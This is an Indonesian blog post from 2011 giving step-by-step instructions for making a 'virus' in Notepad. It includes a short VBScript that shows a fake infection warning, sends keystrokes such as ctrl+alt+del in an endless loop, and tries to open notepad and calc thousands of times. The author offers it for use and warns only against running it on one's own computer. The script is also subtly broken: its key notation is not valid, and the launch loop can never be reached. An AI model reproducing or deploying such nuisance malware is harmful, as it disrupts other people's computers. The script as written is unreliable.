Upload File


Maximum Filesize : 130 MB
By uploading your file, you agree to our Terms of Service.

Kamis, 14 April 2011

MEMBUAT VIRUS VBS DARI NOTEPAD

ok ! langsung saja tanpa basa basi lagi, ini source code untuk membuat virus gue yg gue pelajari & gue perbarui sndiri :
1. buka program notepad dengan cara klik start pilih run kemudian ketikkan notepad atau bisa mengklik start-all programs-accessories-notepad
2. lalu ketikkan kode dibawah ini atau langsung di copy :

option explicit
msgbox "(MAAF KOMPUTER ANDA TELAH TERINFEKSI VIRUS INI !)", vbOkOnly
dim wshshell
set wshshell=wscript.createobject("wscript.shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
wshshell.sendkeys "(ctrl+c)"
wshshell.sendkeys "(ctrl+v)"
wshshell.sendkeys "(ctrl+alt+del)"
wshshell.sendkeys "(tab)"
wshshell.sendkeys "(up)"
wshshell.sendkeys "(down)"
wshshell.sendkeys "virus gaul.exe.vbs"
loop
dim x
for x = 1 to 10000
wshshell.run"notepad.exe"
wshshell.run"calc.exe"
next

3. kemudian save nama file dengan nama virus gaul.vbs
sedikit ilmu pengetahuan tentang virus dari gue......... jangan coba-coba di komputer sendiri yah...
_KeAtas

0 komentar:

Posting Komentar

Jadilah diri sendiri jangan terpengaruh oleh orang lain